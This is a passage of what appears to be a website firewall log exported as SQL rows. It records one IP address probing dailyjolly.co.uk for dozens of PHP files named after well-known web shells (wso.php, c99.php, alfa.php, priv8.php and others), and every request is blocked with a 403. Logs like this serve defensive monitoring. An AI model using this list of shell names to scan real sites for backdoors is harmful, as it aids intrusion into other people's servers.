(.NET CLR 3.5.30729)\"}','5tBa4jTwg0slG6JWzrqdoKHu',0,1674319232.4458,346,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/autoload_classmap.php?http://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1PJ7BRAikQYet4srSxCzZ3Th',0,1674319234.8299,230,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso.php?http://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tE0RPsAb85alwWDGqXz2rMCp',0,1674319236.8380,500,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/doc.php?http://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nu0iwZrt9vUTcpyL1X3qVasf',0,1674319240.5954,228,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/stindex.php?http://dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dnuV630x5ryet7OJYSZ9bLCf',0,1674319247.0864,278,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alwso.php?http://dailyjolly.co.uk/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HIk6pPViTb5UXJSWlAemYFEx',0,1674319249.5449,554,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ups.php?http://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XUFBsq07cDmzurVGZoHS38Mj',0,1674319251.6694,453,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/media-admin.php?http://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9pqbgyTQ5m0YNkDz7FLE2Bla',0,1674319254.4065,343,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sym.php?http://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3urplAFToSzPMy619ejXt7gZ',0,1674319258.0993,265,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sym403.php?http://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kNdyUOg9Ca4ujh8X72qKzlZL',0,1674319260.3661,403,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/fw.php?http://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qx6hHEOSApg5wuZmjob3eM47',0,1674319266.3975,538,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/symlink.php?http://dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yKOilR49vXSQrGgaMjENWPqz',0,1674319270.8608,198,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/shell.php?http://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7RfrY0qdpWjGbuo824A1wZ9F',0,1674319275.5524,296,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1.php?http://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ngd14WQauYMRGm8lwiHv0nZ2',0,1674319278.4430,226,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/data.php?http://dailyjolly.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XypztLn2QUf6NKZFgPOvjkR4',0,1674319280.3698,191,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-blog.php?http://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hTOGeX29rKP4i1nqvlQ57kzS',0,1674319282.5616,237,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/b.php?http://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Y2sPxNUJ1Vkgwi94Kfn8bpE3',0,1674319285.4590,279,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/c.php?http://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OlsPY7mwXWgF0JLizpKZv8EB',0,1674319287.8831,211,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/shx.php?http://dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','T4QhVNmEKv0PYGXr8iDgcxzt',0,1674319289.8716,259,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfa.php?http://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X9Vafrb368voTi2BPjh7IKJS',0,1674319293.6141,196,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/a.php?http://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','siNOJZ2qQoEYDh9I0elLAbW6',0,1674319295.0845,244,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/old-index.php?http://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sejYFGhZ92iBCro4wHAPOfMd',0,1674319297.5381,240,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/FoxWSO.php?http://dailyjolly.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5SDakJxiqEZuUIHzFpRLYNPX',0,1674319301.2797,348,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/x.php?http://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BrYfM6mi9nNyEpd8C4joaUh0',0,1674319305.7352,275,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/403.php?http://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bEYnzxA0fmtSUc4ZGkOFdqWQ',0,1674319307.2215,201,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mini.php?http://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ruJpDUENKYmALf2xetGXIZsl',0,1674319309.8238,184,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/imagesvuln.php?http://dailyjolly.co.uk/imagesvuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Vl7IbEUc93Tj0ZxQHtuG2hry',0,1674319311.8028,268,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/edit-form.php?http://dailyjolly.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2LSNVUhGIndQDYTapKfbc301',0,1674319314.8866,184,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wikindex.php?http://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zlIgdxZvR26CtFfV375rLXHG',0,1674319317.2855,252,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/m.php?http://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sz3iGI6dKDTpX8btOQACFBfZ',0,1674319322.9962,253,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/0byte.php?http://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2tdfDB5mbMJhPkvCcYxXrV8Q',0,1674319326.3869,298,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xx.php?http://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xiDZRo1pnTNkh8ePJGYu23AS',0,1674319328.6718,234,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/new-index.php?http://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2VdSTvYeGRclsJDhuH7tbjUy',0,1674319330.9110,214,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp.php?http://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QpjbyDKMJcI0rAtNkwfFRo97',0,1674319334.5952,291,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-wso.php?http://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gGYCjZ53IdncfXSRitau9xry',0,1674319338.2331,242,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/qindex.php?http://dailyjolly.co.uk/qindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RzAaHrulCKVOmenDE13PLdb9',0,1674319340.8813,335,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/priv8.php?http://dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Cw4eHVuUqW6Bd5K9QXn3sNEf',0,1674319345.3065,287,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/minimo.php?http://dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V5Upzj3xBMnJETOQRy1tYWiZ',0,1674319348.5034,350,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xleet.php?http://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','e0MzjQg9X7Wsn4rtTB1lOuxH',0,1674319354.2278,521,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/V3.php?http://dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Kq6izU9nd3cgMIJlmvYyaTHZ',0,1674319356.3590,263,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/V5.php?http://dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cTs3gA6luiaz9ZKXnfh2F5Gp',0,1674319360.2574,186,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/404.php?http://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','d4D7L1pwFlCbu6WtNsRvaVxi',0,1674319362.0134,259,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/up.php?http://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qB2X4hTtV1Ib7rUlZmiP63nD',0,1674319364.2424,209,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/www.php?http://dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zsCT5EYVigWDrRJLb0XyNB2a',0,1674319366.5899,241,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/100.php?http://dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','J0zytFq8RNXnoAWdYLk6w5US',0,1674319371.6921,197,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/777.php?http://dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','F5iqXExIowcZkdH9CsT2rVnK',0,1674319375.3304,203,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/defau1t.php?http://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','T7Lkm3CZ4Njch2KOqA6XzyVp',0,1674319385.3561,499,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/f.php?http://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','04W9S7zZmDPFkYp8bdEiLeVu',0,1674319390.8164,273,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xox.php?http://dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SlsAnVgueDRHoyfzFdacGW2O',0,1674319392.8488,248,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/o.php?http://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HiajNK6eObcY8RZSuygQC41G',0,1674319394.9785,261,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/new.php?http://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KGjrfW0Ap3xgVihXSPIcN514',0,1674319396.9468,221,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sindex.php?http://dailyjolly.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VsibIjfZPQt0SMxpNz9FAREg',0,1674319401.9613,282,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/baindex.php?http://dailyjolly.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bCy9WsQfthXYJwVuM5KD1ekN',0,1674319403.8098,191,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wi.php?http://dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ltwrnejJ9ABbWNYOvxFcfQEd',0,1674319407.2715,249,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mar.php?http://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xc2y7wf49YI0FPRHGmnV5QUW',0,1674319411.4333,290,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/root.php?http://dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Y5l6DsZqok29zpTmC4E7wIvB',0,1674319416.8376,220,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/nee.php?http://dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mFtqvIZ5rTPl4YWGK760wVao',0,1674319418.2364,222,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/v.php?http://dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CbsKrqMBzymQjPRhWEVAftkg',0,1674319424.3349,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/z.php?http://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gEspTvtaqrJPo2eLVXzD3YCk',0,1674319426.8812,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/g.php?http://dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nCMqbFJTQ648W0YxPyG37sKB',0,1674319428.2390,248,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/c99.php?http://dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','le61Y2wutBJ5obAITz8ND3qE',0,1674319431.6055,283,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/w.php?http://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','d4OS3Zhz0mB7gtK5TrGeDvYX',0,1674319433.2857,221,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ws.php?http://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HQVi01GKl8zaLqO2wZUhvmMP',0,1674319437.2486,295,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/2.php?http://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','e4vwcNKi1kUG35fFAbOlgYzP',0,1674319438.5602,247,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/lol.php?http://dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3ikvVtwua7TzqIGQfZXBo5pO',0,1674319440.5835,232,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/87.php?http://dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ouLStHEWd2ZK5CTArGBfybwY',0,1674319442.7446,203,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/7yn.php?http://dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qJ4QYHfBvhruaNbclg2SOxeC',0,1674319444.1649,390,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/haxor.php?http://dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3mDRw0z6YNMA8jS1JWBkFXea',0,1674319447.8816,251,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/13.php?http://dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZEbyGDadiCnPTIOFugUWsBJj',0,1674319453.6489,263,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/e.php?http://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5z60xwrSBc2XDdpThVFHel13',0,1674319456.3587,203,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/r.php?http://dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X7wNlat5mpeETGr2SMz8sx1u',0,1674319459.1473,225,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/t.php?http://dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mfFTXv6nWZoIy2akVE5cQxBC',0,1674319461.4494,209,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/y.php?http://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1P6MXoLiGdF8ky2qBDHaRVZh',0,1674319463.0042,325,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/u.php?http://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 